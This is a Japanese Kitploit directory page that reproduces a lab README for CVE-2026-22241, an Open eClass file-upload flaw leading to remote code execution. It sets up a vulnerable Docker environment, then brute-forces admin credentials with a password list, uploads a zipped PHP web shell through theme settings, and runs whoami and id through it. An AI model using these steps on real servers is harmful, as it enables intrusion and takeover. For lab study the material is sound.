Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22241 — CVE-2026-22241 用ラボ環境 | Kitploit
ツール/GitHubGitHub/cves-labs/cve-2026-22241
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

CVE-2026-22241 用ラボ環境

リポジトリを見る
472ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-22241

CVE-2026-22241 のラボ環境

脆弱性の説明:

  • 脆弱性: 危険なタイプのファイルの無制限アップロード
  • 影響: リモートコード実行 (RCE)
  • 説明: この欠陥により、管理者権限を持つ攻撃者が悪意のある PHP ファイル (Web Shell) をアップロードでき、Web サーバーの整合性とセキュリティが完全に侵害される可能性があります。
  • 対象システム: OpenClass Educational Infrastructure

1. 環境の構築

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

https://www.openeclass.org/en/previous-versions/ を開き、openeclass-4.0.1.zip をダウンロードしてください

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

image

2. 脆弱性の悪用:

ツールをダウンロード

ZAP での鍵リスト(ブルートフォース): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

eclass ページで: 管理ツール -> テーマ設定 に移動し、poc.zip をアップロードします

新しいページで:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id